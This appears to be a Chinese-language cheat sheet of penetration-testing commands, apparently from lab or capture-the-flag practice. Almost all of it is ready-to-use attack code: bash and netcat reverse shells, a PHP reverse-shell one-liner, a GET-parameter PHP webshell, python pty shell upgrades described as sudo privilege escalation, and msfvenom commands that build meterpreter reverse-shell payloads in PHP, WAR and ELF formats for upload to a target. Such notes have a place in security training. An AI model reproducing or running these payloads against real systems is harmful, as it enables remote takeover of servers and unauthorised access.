命令执行漏洞反弹shell代码:
echo “bash -i >& /dev/tcp/192.168.56.102/6666 0>&1” | bash
burpsuite抓包修改用户名密码的数据包内容代入数据库执行,反弹shell语句
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.56.103 1234 >/tmp/f
php反弹脚本
<?php $sock=fsockopen("192.168.59.129",7777);exec("/bin/sh -i <&3 >&3 2>&3");?>
kali自带php反弹脚本:
php-reverse-shell.php
GET方式传递数据的一句话木马
<?php system($_GET['cmd']);?>
传递数据通过URL传送,一些特殊字符与空格需要URL编码
绕过限制sudo提权
sudo python -c ‘import pty;pty.spawn("/bin/bash")’
反弹shell后,显示当前用户信息
python -c ‘import pty; pty.spawn("/bin/bash")’
Msfvenom生成一个反弹shell
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.212.6 LPORT=443 > shell443.php
利用模块
use exploit/multi/handler
msf生成一个war格式的反弹shell
msfvenom -p java/meterpreter/reverse_tcp lhost=192.168.110.5 lport=6666 -f war -o test.war
msfvenom生成一个payload,上传到目标,增加执行权限
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.212.6 LPORT=8888 -f elf > shell.elf